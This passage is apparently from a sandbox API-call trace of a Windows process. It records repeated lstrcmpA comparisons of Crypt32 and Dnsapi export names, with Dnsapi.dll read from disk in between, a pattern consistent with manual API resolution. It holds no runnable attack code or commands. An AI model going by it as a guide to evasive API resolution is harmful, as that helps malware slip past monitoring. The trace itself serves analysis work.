(lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0252.337] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.337] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.338] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.338] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.338] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0252.339] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0252.339] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0252.339] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0252.339] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0252.339] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0252.339] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0252.339] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.339] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.339] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.339] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.339] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.339] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.339] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.339] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0252.339] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0252.339] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0252.339] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0252.339] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0252.339] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0252.339] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0252.339] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0252.339] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.339] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.339] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.339] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.339] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.339] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.339] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.340] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0252.340] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0252.340] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0252.340] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.340] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.340] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.340] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0252.340] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0252.340] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0252.340] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0252.340] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.340] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.340] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0252.341] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0252.342] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.342] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0252.343] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0252.343] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0252.356] GetProcessHeap () returned 0x430000 [0252.356] HeapFree (in: hHeap=0x430000, dwFlags=0x0, lpMem=0x4056040 | out: hHeap=0x430000) returned 1 [0252.533] GetProcessHeap () returned 0x430000 [0252.533] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0x10) returned 0x449780 [0252.534] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0252.551] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0252.551] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0252.551] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0252.551] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0252.551] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0252.551] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0252.552] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=686984) returned 1 [0252.552] GetProcessHeap () returned 0x430000 [0252.552] RtlAllocateHeap (HeapHandle=0x430000, Flags=0x0, Size=0xa7b88) returned 0x39cd010 [0252.553] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0252.554] ReadFile (in: hFile=0x17c, lpBuffer=0x39cd010, nNumberOfBytesToRead=0xa7b88, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x39cd010*, lpNumberOfBytesRead=0x14f5a4*=0xa7b88, lpOverlapped=0x0) returned 1 [0252.743] CloseHandle (hObject=0x17c) returned 1 [0252.743] lstrcmpA (lpString1="AdaptiveTimeout_ClearInterfaceSpecificConfiguration", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 0 [0252.743] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.743] lstrcmpA (lpString1="AdaptiveTimeout_ResetAdaptiveTimeout", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 0 [0252.743] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.743] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.743] lstrcmpA (lpString1="AddRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 0 [0252.743] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.743] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.743] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="AddRefQueryBlobEx") returned 1 [0252.743] lstrcmpA (lpString1="BreakRecordsIntoBlob", lpString2="BreakRecordsIntoBlob") returned 0 [0252.743] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.744] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.744] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="AddRefQueryBlobEx") returned 1 [0252.744] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="BreakRecordsIntoBlob") returned 1 [0252.744] lstrcmpA (lpString1="Coalesce_UpdateNetVersion", lpString2="Coalesce_UpdateNetVersion") returned 0 [0252.744] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.744] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.744] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="AddRefQueryBlobEx") returned 1 [0252.744] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="BreakRecordsIntoBlob") returned 1 [0252.744] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.744] lstrcmpA (lpString1="CombineRecordsInBlob", lpString2="CombineRecordsInBlob") returned 0 [0252.744] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.744] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.744] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="AddRefQueryBlobEx") returned 1 [0252.744] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="BreakRecordsIntoBlob") returned 1 [0252.744] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.744] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="CombineRecordsInBlob") returned 1 [0252.744] lstrcmpA (lpString1="DeRefQueryBlobEx", lpString2="DeRefQueryBlobEx") returned 0 [0252.744] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.744] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.744] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="AddRefQueryBlobEx") returned 1 [0252.744] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="BreakRecordsIntoBlob") returned 1 [0252.744] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.744] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="CombineRecordsInBlob") returned 1 [0252.744] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DeRefQueryBlobEx") returned -1 [0252.744] lstrcmpA (lpString1="DelaySortDAServerlist", lpString2="DelaySortDAServerlist") returned 0 [0252.744] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.744] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.744] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="AddRefQueryBlobEx") returned 1 [0252.744] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="BreakRecordsIntoBlob") returned 1 [0252.744] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.744] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="CombineRecordsInBlob") returned 1 [0252.744] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DeRefQueryBlobEx") returned 1 [0252.744] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DelaySortDAServerlist") returned 1 [0252.744] lstrcmpA (lpString1="DnsAcquireContextHandle_A", lpString2="DnsAcquireContextHandle_A") returned 0 [0252.745] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ClearInterfaceSpecificConfiguration") returned 1 [0252.745] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AdaptiveTimeout_ResetAdaptiveTimeout") returned 1 [0252.745] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="AddRefQueryBlobEx") returned 1 [0252.745] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="BreakRecordsIntoBlob") returned 1 [0252.745] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="Coalesce_UpdateNetVersion") returned 1 [0252.745] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="CombineRecordsInBlob") returned 1 [0252.745] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DeRefQueryBlobEx") returned 1 [0252.745] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DelaySortDAServerlist") returned 1 [0252.745] lstrcmpA (lpString1="DnsAcquireContextHandle_W", lpString2="DnsAcquireContextHandle_A") returned 1 